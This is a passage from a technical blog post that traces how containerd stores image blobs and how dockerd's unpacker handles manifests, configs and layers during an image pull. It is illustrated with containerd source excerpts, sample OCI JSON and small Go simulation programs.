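	instances := make(map[string]any)
	for _, r := range registered {
		obj, err := r.InitFn(&initContext{Properties: props})
		if err != nil {
			return nil, fmt.Errorf("init %s: %w", r.URI(), err)
		}
		instances[r.URI()] = obj
	}
	return instances, nil
}

func main() {
	instances, err := initAll(map[string]string{"root": "/tmp/demo"})
	if err != nil {
		panic(err)
	}
	for uri, obj := range instances {
		fmt.Printf("%s -> %+v\n", uri, obj)
	}
}
```

<p>The plugin never chooses its own root. It only reads a property that whoever runs the init callbacks has placed in the context.</p>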

<p>So where is <code class="language-plaintext highlighter-rouge">plugins.PropertyRootDir</code> defined? When starting the <code class="language-plaintext highlighter-rouge">containerd</code> daemon, <code class="language-plaintext highlighter-rouge">New()</code> iterates through the loaded plugins [9]. It creates a context for each plugin object and sets <code class="language-plaintext highlighter-rouge">plugins.PropertyRootDir</code> [10]. By default, <code class="language-plaintext highlighter-rouge">config.Root</code> is set to <strong><code class="language-plaintext highlighter-rouge">/var/lib/containerd</code></strong>, and <code class="language-plaintext highlighter-rouge">id</code> comes from the plugin’s <code class="language-plaintext highlighter-rouge">URI()</code> function.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd/server/server.go</span>
<span class="k">func</span> <span class="n">New</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">config</span> <span class="o">*</span><span class="n">srvconfig</span><span class="o">.</span><span class="n">Config</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">Server</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">loaded</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">LoadPlugins</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">config</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">p</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">loaded</span> <span class="p">{</span> <span class="c">// [9]</span>
        <span class="n">id</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">URI</span><span class="p">()</span>
        <span class="c">// [...]</span>
        <span class="n">initContext</span> <span class="o">:=</span> <span class="n">plugin</span><span class="o">.</span><span class="n">NewContext</span><span class="p">(</span>
            <span class="n">ctx</span><span class="p">,</span>
            <span class="n">initialized</span><span class="p">,</span>
            <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">{</span>
                <span class="n">plugins</span><span class="o">.</span><span class="n">PropertyRootDir</span><span class="o">:</span>      <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">Root</span><span class="p">,</span> <span class="n">id</span><span class="p">),</span> <span class="c">// [10]</span>
                <span class="c">// [...]</span>
            <span class="p">},</span>
        <span class="p">)</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// defaults/defaults_unix.go</span>
<span class="k">const</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="n">DefaultRootDir</span> <span class="o">=</span> <span class="s">"/var/lib/containerd"</span>
    <span class="c">// [...]</span>
<span class="p">)</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">URI()</code> concatenates the plugin’s type string, which is <code class="language-plaintext highlighter-rouge">"io.containerd.content.v1"</code> here, and its ID, which is <code class="language-plaintext highlighter-rouge">"content"</code> here, separated by a dot. So the image files are stored <strong>inside the directory <code class="language-plaintext highlighter-rouge">/var/lib/containerd/io.containerd.content.v1.content</code></strong>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/plugin/plugin.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="o">*</span><span class="n">Registration</span><span class="p">)</span> <span class="n">URI</span><span class="p">()</span> <span class="kt">string</span> <span class="p">{</span>
    <span class="c">// r.Type.String() == "io.containerd.content.v1"</span>
    <span class="c">// r.ID</span>
    <span class="k">return</span> <span class="n">r</span><span class="o">.</span><span class="n">Type</span><span class="o">.</span><span class="n">String</span><span class="p">()</span> <span class="o">+</span> <span class="s">"."</span> <span class="o">+</span> <span class="n">r</span><span class="o">.</span><span class="n">ID</span>
<span class="p">}</span>

<span class="c">// plugins/types.go</span>
<span class="k">const</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="n">ContentPlugin</span> <span class="n">plugin</span><span class="o">.</span><span class="n">Type</span> <span class="o">=</span> <span class="s">"io.containerd.content.v1"</span>
    <span class="c">// [...]</span>
<span class="p">)</span>
</code></pre></div></div>

<p>List the directory and you’ll find the image blobs.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@aaa:~# <span class="nb">ls</span> <span class="nt">-al</span> /var/lib/containerd/io.containerd.content.v1.content/
total 16
drwxr-xr-x  4 root root 4096 May 27 11:47 <span class="nb">.</span>
drwx------ 13 root root 4096 Apr  9 14:51 ..
drwxr-xr-x  3 root root 4096 Apr  9 14:51 blobs
drwxr-xr-x  2 root root 4096 May 28 10:49 ingest
</code></pre></div></div>

<h2 id="2-unpack-an-image">2. Unpack an Image</h2>

<h3 id="21-dockerd-side">2.1. dockerd side</h3>

<p>The unpacker is installed as a wrapper around the chained image handlers [1], so its handler runs first for every descriptor. When the wrapper is applied, <code class="language-plaintext highlighter-rouge">unpacker.Unpack()</code> is called [2] and returns the wrapping handler.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/client/pull.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">Pull</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">RemoteOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="n">Image</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">pullCtx</span><span class="o">.</span><span class="n">Unpack</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">unpacker</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">unpack</span><span class="o">.</span><span class="n">NewUnpacker</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">ContentStore</span><span class="p">(),</span> <span class="n">uopts</span><span class="o">...</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">pullCtx</span><span class="o">.</span><span class="n">HandlerWrapper</span> <span class="o">=</span> <span class="k">func</span><span class="p">(</span><span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">)</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="k">return</span> <span class="n">unpacker</span><span class="o">.</span><span class="n">Unpack</span><span class="p">(</span><span class="n">h</span><span class="p">)</span> <span class="c">// [2]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">img</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">pullCtx</span><span class="p">,</span> <span class="n">ref</span><span class="p">,</span> <span class="m">1</span><span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">rCtx</span> <span class="o">*</span><span class="n">RemoteContext</span><span class="p">,</span> <span class="n">ref</span> <span class="kt">string</span><span class="p">,</span> <span class="n">limit</span> <span class="kt">int</span><span class="p">)</span> <span class="p">(</span><span class="n">images</span><span class="o">.</span><span class="n">Image</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">handler</span> <span class="o">=</span> <span class="n">images</span><span class="o">.</span><span class="n">Handlers</span><span class="p">(</span><span class="n">handlers</span><span class="o">...</span><span class="p">)</span>
    <span class="c">// [...]</span>
    
    <span class="k">if</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">HandlerWrapper</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="n">handler</span> <span class="o">=</span> <span class="n">rCtx</span><span class="o">.</span><span class="n">HandlerWrapper</span><span class="p">(</span><span class="n">handler</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">handler</span><span class="p">,</span> <span class="n">limiter</span><span class="p">,</span> <span class="n">desc</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
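
<p>The wrapping pattern itself is easy to reproduce. The following is a minimal sketch with a simplified <code class="language-plaintext highlighter-rouge">Handler</code> type (a stand-in for <code class="language-plaintext highlighter-rouge">images.Handler</code>, using plain strings instead of descriptors). It only shows the call order: the wrapper is entered first, delegates to the inner handler, and then sees the children.</p>

```go
package main

import "fmt"

// Handler is a simplified stand-in for images.Handler: it takes a descriptor
// name and returns the names of its children.
type Handler func(desc string) ([]string, error)

// wrap plays the role of HandlerWrapper. The returned handler is entered
// first, delegates to the inner handler, and can then inspect the children.
// The trace slice records the call order for demonstration purposes.
func wrap(inner Handler, trace *[]string) Handler {
	return func(desc string) ([]string, error) {
		*trace = append(*trace, "wrapper enter "+desc)
		children, err := inner(desc)
		if err != nil {
			return nil, err
		}
		*trace = append(*trace, "wrapper after inner "+desc)
		return children, nil
	}
}

func main() {
	var trace []string
	inner := Handler(func(desc string) ([]string, error) {
		trace = append(trace, "inner "+desc)
		return []string{"config", "layer"}, nil
	})

	children, err := wrap(inner, &trace)("manifest")
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(children)
	for _, step := range trace {
		fmt.Println(step)
	}
}
```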

<p>After the wrapped handlers finish, the handler returned by <code class="language-plaintext highlighter-rouge">Unpack()</code> gets the sub-descriptors [3]. If the descriptor is a manifest [4], it splits the sub-descriptors into two types: <strong>layer</strong> and <strong>non-layer</strong>. The layer list is then recorded under the digest of each non-layer sub-descriptor [5].</p>

<p>For a config descriptor, the layers are retrieved and unpacked [6].</p>

<p>Note that the children returned for a manifest descriptor <strong>contain only non-layer sub-descriptors</strong> [7], so the layers are not downloaded <strong>until <code class="language-plaintext highlighter-rouge">u.unpack()</code> is called</strong>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">u</span> <span class="o">*</span><span class="n">Unpacker</span><span class="p">)</span> <span class="n">Unpack</span><span class="p">(</span><span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">)</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">images</span><span class="o">.</span><span class="n">HandlerFunc</span><span class="p">(</span><span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">children</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">h</span><span class="o">.</span><span class="n">Handle</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">images</span><span class="o">.</span><span class="n">IsManifestType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="p">{</span> <span class="c">// [4]</span>
            <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">child</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">children</span> <span class="p">{</span>
                <span class="c">// [...]</span>
                <span class="k">if</span> <span class="n">images</span><span class="o">.</span><span class="n">IsLayerType</span><span class="p">(</span><span class="n">child</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="o">||</span> <span class="n">layerTypes</span><span class="p">[</span><span class="n">child</span><span class="o">.</span><span class="n">MediaType</span><span class="p">]</span> <span class="p">{</span>
                    <span class="n">manifestLayers</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">manifestLayers</span><span class="p">,</span> <span class="n">child</span><span class="p">)</span>
                <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                    <span class="n">nonLayers</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">nonLayers</span><span class="p">,</span> <span class="n">child</span><span class="p">)</span>
                <span class="p">}</span>
            <span class="p">}</span>

            <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">nl</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">nonLayers</span> <span class="p">{</span>
                <span class="n">layers</span><span class="p">[</span><span class="n">nl</span><span class="o">.</span><span class="n">Digest</span><span class="p">]</span> <span class="o">=</span> <span class="n">manifestLayers</span> <span class="c">// [5]</span>
            <span class="p">}</span>
            <span class="n">children</span> <span class="o">=</span> <span class="n">nonLayers</span> <span class="c">// [7]</span>

        <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="n">images</span><span class="o">.</span><span class="n">IsConfigType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="o">||</span> <span class="n">configTypes</span><span class="p">[</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">]</span> <span class="p">{</span>
            <span class="c">// "application/vnd.docker.container.image.v1+json" or "application/vnd.oci.image.config.v1+json"</span>
            <span class="c">// [...]</span>
            <span class="n">l</span> <span class="o">:=</span> <span class="n">layers</span><span class="p">[</span><span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">]</span>
            <span class="c">// [...]</span>
            <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">l</span><span class="p">)</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="p">{</span>
                <span class="n">u</span><span class="o">.</span><span class="n">eg</span><span class="o">.</span><span class="n">Go</span><span class="p">(</span><span class="k">func</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
                    <span class="k">return</span> <span class="n">u</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">l</span><span class="p">)</span> <span class="c">// [6]</span>
                <span class="p">})</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Take one of the manifests fetched while pulling the <code class="language-plaintext highlighter-rouge">ubuntu:24.04</code> image as an example. For the JSON response below, the <code class="language-plaintext highlighter-rouge">Unpack()</code> handler gets two sub-descriptors: a config and a layer, so children looks like <code class="language-plaintext highlighter-rouge">[config, layer1, ... (if any)]</code>. It first assigns <code class="language-plaintext highlighter-rouge">layers[0b1...b27] = [b40...081 (layer sub-descriptor)]</code> [5]. In the next round, the config descriptor is processed and <code class="language-plaintext highlighter-rouge">layers[0b1...b27]</code> is unpacked [6].</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="nl">"schemaVersion"</span><span class="p">:</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w">
    </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.manifest.v1+json"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"config"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
        </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.config.v1+json"</span><span class="p">,</span><span class="w">
        </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">2051</span><span class="p">,</span><span class="w">
        </span><span class="nl">"digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:0b1ebe5dd42682bb8eda97ecf10a09f70f18d2d4af35f82b9271badac5dbeb27"</span><span class="w">
    </span><span class="p">},</span><span class="w">
    </span><span class="nl">"layers"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
        </span><span class="p">{</span><span class="w">
            </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.layer.v1.tar+gzip"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">29732978</span><span class="p">,</span><span class="w">
            </span><span class="nl">"digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:b40150c1c2717d324cdb17278c8efdfa4dfcd2ffe083e976f0bcedf31115f081"</span><span class="w">
        </span><span class="p">}</span><span class="w">
    </span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
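
<p>The two rounds can be traced with a small simulation. This is only a sketch of the branch structure: <code class="language-plaintext highlighter-rouge">desc</code>, <code class="language-plaintext highlighter-rouge">unpackState</code>, and <code class="language-plaintext highlighter-rouge">handle</code> are names I made up, the media-type checks are reduced to exact string matches, the manifest digest is a placeholder, and the real unpack step is replaced by recording the layer digests.</p>

```go
package main

import "fmt"

// desc is a simplified stand-in for ocispec.Descriptor.
type desc struct {
	MediaType string
	Digest    string
}

const (
	manifestType = "application/vnd.oci.image.manifest.v1+json"
	configType   = "application/vnd.oci.image.config.v1+json"
	layerType    = "application/vnd.oci.image.layer.v1.tar+gzip"
)

// unpackState keeps the layers map that is shared across handler calls.
type unpackState struct {
	layers   map[string][]desc // config digest -> layers of that image
	unpacked []string          // layer digests handed to the omitted unpack step
}

// handle mimics the manifest/config branches for one descriptor, given the
// children that the inner handler returned for it.
func (s *unpackState) handle(d desc, children []desc) []desc {
	switch d.MediaType {
	case manifestType:
		var manifestLayers, nonLayers []desc
		for _, c := range children {
			if c.MediaType == layerType {
				manifestLayers = append(manifestLayers, c)
			} else {
				nonLayers = append(nonLayers, c)
			}
		}
		for _, nl := range nonLayers {
			s.layers[nl.Digest] = manifestLayers // corresponds to [5]
		}
		return nonLayers // corresponds to [7]: layers are held back
	case configType:
		for _, l := range s.layers[d.Digest] {
			s.unpacked = append(s.unpacked, l.Digest) // stands in for [6]
		}
	}
	return children
}

func main() {
	config := desc{MediaType: configType, Digest: "sha256:0b1ebe5dd42682bb8eda97ecf10a09f70f18d2d4af35f82b9271badac5dbeb27"}
	layer := desc{MediaType: layerType, Digest: "sha256:b40150c1c2717d324cdb17278c8efdfa4dfcd2ffe083e976f0bcedf31115f081"}
	manifest := desc{MediaType: manifestType, Digest: "sha256:placeholder-manifest-digest"}

	s := &unpackState{layers: map[string][]desc{}}
	next := s.handle(manifest, []desc{config, layer}) // round 1: manifest
	for _, d := range next {
		s.handle(d, nil) // round 2: config
	}
	fmt.Println("children after manifest:", len(next))
	fmt.Println("layers handed to unpack:", s.unpacked)
}
```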

<p><code class="language-plaintext highlighter-rouge">unpack()</code> first reads the config blob and unmarshals it into <code class="language-plaintext highlighter-rouge">i</code> [8], and later calls <code class="language-plaintext highlighter-rouge">u.fetch()</code> [9] in a goroutine to download the layer data. Once a layer has been downloaded, <code class="language-plaintext highlighter-rouge">a.Apply()</code> is called to unpack the compressed layer [10].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">u</span> <span class="o">*</span><span class="n">Unpacker</span><span class="p">)</span> <span class="n">unpack</span><span class="p">(</span>
    <span class="n">h</span> <span class="n">images</span><span class="o">.</span><span class="n">Handler</span><span class="p">,</span>
    <span class="n">config</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span>
    <span class="n">layers</span> <span class="p">[]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span>
<span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">p</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">content</span><span class="o">.</span><span class="n">ReadBlob</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">u</span><span class="o">.</span><span class="n">content</span><span class="p">,</span> <span class="n">config</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="n">i</span> <span class="n">unpackConfig</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">i</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [8]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">topHalf</span> <span class="o">:=</span> <span class="k">func</span><span class="p">(</span><span class="n">i</span> <span class="kt">int</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">span</span> <span class="o">*</span><span class="n">tracing</span><span class="o">.</span><span class="n">Span</span><span class="p">,</span> <span class="n">startAt</span> <span class="n">time</span><span class="o">.</span><span class="n">Time</span><span class="p">)</span> <span class="p">(</span><span class="o">&lt;-</span><span class="k">chan</span> <span class="o">*</span><span class="n">unpackStatus</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">key</span> <span class="o">=</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="n">snapshots</span><span class="o">.</span><span class="n">UnpackKeyFormat</span><span class="p">,</span> <span class="n">uniquePart</span><span class="p">(),</span> <span class="n">chainID</span><span class="p">)</span>
        <span class="n">mounts</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">sn</span><span class="o">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">parent</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// call s.createSnapshot() -&gt; mounts := s.buildMounts()</span>
        <span class="c">// [...]</span>
        <span class="k">go</span> <span class="k">func</span><span class="p">(</span><span class="n">i</span> <span class="kt">int</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">err</span> <span class="o">:=</span> <span class="n">u</span><span class="o">.</span><span class="n">fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">h</span><span class="p">,</span> <span class="n">layers</span><span class="p">[</span><span class="n">i</span><span class="o">:</span><span class="p">],</span> <span class="n">fetchC</span><span class="p">)</span> <span class="c">// [9]</span>
        <span class="p">}(</span><span class="n">i</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">diff</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">a</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">mounts</span><span class="p">,</span> <span class="n">unpack</span><span class="o">.</span><span class="n">ApplyOpts</span><span class="o">...</span><span class="p">)</span> <span class="c">// [10]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">desc</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">layers</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">statusCh</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">topHalf</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">layerSpan</span><span class="p">,</span> <span class="n">unpackLayerStart</span><span class="p">)</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
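
<p>The handoff between the background fetch [9] and the apply step [10] can be sketched as follows. This assumes one “done” channel per layer, which the fetcher closes once that layer is available. <code class="language-plaintext highlighter-rouge">fetchAll</code> and <code class="language-plaintext highlighter-rouge">applyAll</code> are hypothetical names, and no real download or extraction happens here.</p>

```go
package main

import "fmt"

// fetchAll pretends to download each layer in order and closes the matching
// channel once that layer is available. Hypothetical stand-in for u.fetch().
func fetchAll(layers []string, done []chan struct{}) {
	for i := range layers {
		// A real implementation would download layers[i] here.
		close(done[i])
	}
}

// applyAll starts the fetch in the background, then waits for each layer to
// be fetched before "applying" it. It returns the layers in apply order.
func applyAll(layers []string) []string {
	done := make([]chan struct{}, len(layers))
	for i := range done {
		done[i] = make(chan struct{})
	}
	go fetchAll(layers, done)

	applied := make([]string, 0, len(layers))
	for i, l := range layers {
		<-done[i] // block until layer i has been fetched
		applied = append(applied, l) // stands in for a.Apply()
	}
	return applied
}

func main() {
	fmt.Println(applyAll([]string{"layer-0", "layer-1", "layer-2"}))
}
```

<p>The point of this shape is that later layers can keep downloading while earlier ones are being applied.</p>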

<p>The config is represented as the <code class="language-plaintext highlighter-rouge">unpackConfig</code> structure.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.go</span>
<span class="k">type</span> <span class="n">unpackConfig</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">ocispec</span><span class="o">.</span><span class="n">Platform</span>
    <span class="n">RootFS</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">RootFS</span> <span class="s">`json:"rootfs"`</span>
<span class="p">}</span>
</code></pre></div></div>
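
<p>Because the struct only declares the platform fields and <code class="language-plaintext highlighter-rouge">rootfs</code>, everything else in the config blob is ignored during unmarshalling. Here is a minimal sketch using local stand-ins for the <code class="language-plaintext highlighter-rouge">ocispec</code> types (reduced to a few fields). The sample JSON is made up for illustration, including the placeholder diff ID.</p>

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Platform is a reduced stand-in for ocispec.Platform.
type Platform struct {
	Architecture string `json:"architecture"`
	OS           string `json:"os"`
}

// RootFS is a stand-in for ocispec.RootFS.
type RootFS struct {
	Type    string   `json:"type"`
	DiffIDs []string `json:"diff_ids"`
}

// unpackConfig mirrors the struct above, built from the local stand-ins.
type unpackConfig struct {
	Platform
	RootFS RootFS `json:"rootfs"`
}

// parseUnpackConfig decodes a config blob, keeping only the declared fields.
func parseUnpackConfig(blob []byte) (unpackConfig, error) {
	var c unpackConfig
	err := json.Unmarshal(blob, &c)
	return c, err
}

func main() {
	// Made-up sample: the "config" object is present but not declared in
	// unpackConfig, so encoding/json silently skips it.
	blob := []byte(`{
		"architecture": "amd64",
		"os": "linux",
		"config": {"Cmd": ["/bin/bash"]},
		"rootfs": {"type": "layers", "diff_ids": ["sha256:placeholder-diff-id"]}
	}`)

	c, err := parseUnpackConfig(blob)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(c.Architecture, c.OS, c.RootFS.Type, len(c.RootFS.DiffIDs))
}
```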

<p>The config JSON blob looks like:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"architecture"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"config"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
    </span><span class="nl">"Hostname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Domainname"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"User"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStdin"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStdout"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"AttachStderr"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
    </span><span class="nl">"Tty"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
